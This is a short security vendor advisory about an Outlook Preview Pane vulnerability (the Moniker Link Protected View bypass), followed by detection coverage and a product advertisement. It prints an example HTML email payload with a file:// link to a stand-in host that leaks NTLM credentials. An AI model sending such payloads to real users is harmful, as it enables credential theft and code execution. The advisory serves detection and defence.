Application Details
Microsoft Outlook is an application that's used mainly to send and receive emails. It's also used to manage various types of personal data including calendar appointments and similar entries, tasks, contacts, and notes.
Vulnerability
Microsoft Outlook could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper neutralization of user-supplied input by the Preview Pane feature.
Identification
An attacker could exploit this vulnerability to bypass the Protected View Protocol, obtain local NTLM credentials, and execute arbitrary code with elevated privileges on the system. By modifying a hyperlink with the "!" character and additional text in the Moniker Link the attacker is able to bypass Outlook's Protected View. This allows the attacker's remote resource to be accessed without triggering any warnings.
An example payload sent as an email:
<html>
<body>
<h1><a href=\"file:///\\10.10.10.10!meeting\">Meeting - click here.</a></h1>
</body>
</html>Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
Coverage
Idappcom have created signature 8024675 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional